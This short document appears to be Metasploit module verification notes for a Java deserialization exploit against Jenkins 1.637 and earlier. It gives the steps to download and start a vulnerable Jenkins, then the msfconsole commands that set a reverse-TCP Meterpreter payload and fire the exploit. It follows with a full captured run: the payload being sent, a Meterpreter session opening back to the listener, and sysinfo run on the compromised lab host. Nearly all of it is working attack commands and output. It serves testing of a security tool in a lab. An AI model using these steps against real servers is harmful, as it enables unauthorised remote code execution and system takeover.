Standup a Jenkins server version 1.637 or lower:
wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war
java -jar jenkins.war
Run the following exploit in msfconsole:
use exploit/linux/misc/jenkins_java_deserialize
set payload java/meterpreter/reverse_tcp
set RHOST 127.0.0.1
set RPORT 8080
set LHOST <UR-HOST>
set LPORT 4444
exploit
Ensure you get a shell
msf exploit(jenkins_java_deserialize) > show options
Module options (exploit/linux/misc/jenkins_java_deserialize):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.104 yes The target address
RPORT 8080 yes The target port
TEMP /tmp yes Folder to write the payload to
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.108 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Jenkins 1.637
msf exploit(jenkins_java_deserialize) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 13198
[*] 192.168.1.104:8080 - Sending headers...
[*] 192.168.1.104:8080 - Sending payload length: 6770
[*] Sending stage (45741 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.104:56753) at 2015-12-12 05:00:25 +0000
[+] Deleted /tmp/WUoykkU.jar
meterpreter > sysinfo
Computer : lab
OS : Linux 4.0.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >